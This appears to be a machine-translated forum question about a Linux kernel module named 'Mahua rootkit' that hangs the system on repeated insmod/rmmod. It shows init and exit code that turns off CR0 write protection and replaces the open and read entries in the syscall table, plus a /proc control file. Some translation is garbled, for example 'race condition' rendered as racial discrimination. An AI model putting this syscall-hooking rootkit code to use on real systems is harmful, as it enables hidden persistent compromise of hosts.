rmmod有时挂起系统之外,它运行良好
在一个终端运行中:
for i in `seq 1000`; do insmod mhrootkit.ko; sync; rmmod mhrootkit; done
然后在另一个termimal运行:
dmesg
然后系统挂起。我想可能会有一些种族歧视。这是一段代码:
int __init mhrootkit_init(void) {
unsigned long cr0;
printk(KERN_INFO "Mahua rootkit init\n");
sys_call_table = get_sys_call_table();
if (!sys_call_table)
return -1;
/* hook */
cr0 = read_cr0();
write_cr0(cr0 & ~0x10000);
/* open */
ori_sys_open = (open_func)sys_call_table[__NR_open];
sys_call_table[__NR_open] = (unsigned long*)fake_open;
/* read */
ori_sys_read = (read_func)sys_call_table[__NR_read];
sys_call_table[__NR_read] = (unsigned long*)fake_read;
write_cr0(cr0);
/* hook end */
/* create proc file */
procf = proc_create("mhctl", 0600, NULL, &fops);
if (!procf)
printk("create proc file failed\n");
return 0;
}
void __exit mhrootkit_exit(void) {
unsigned long cr0;
printk(KERN_INFO "Mahua rootkit exit\n");
/* restore hook */
cr0 = read_cr0();
write_cr0(cr0 & ~0x10000);
sys_call_table[__NR_open] = (unsigned long*)ori_sys_open;
sys_call_table[__NR_read] = (unsigned long*)ori_sys_read;
write_cr0(cr0);
/* remove proc file */
proc_remove(procf);
}
HardWare:Vmware Workstation 12 Player
操作系统:CentOS 7.2.1511
我认为问题是当我恢复系统调用进入和退出时,'某人'可能持有野指针(fake_open/fake_read)。然后我添加一个原子计数器来ref ref open和read操作。但它仍然悬而未决,没有更好的。有人想过吗?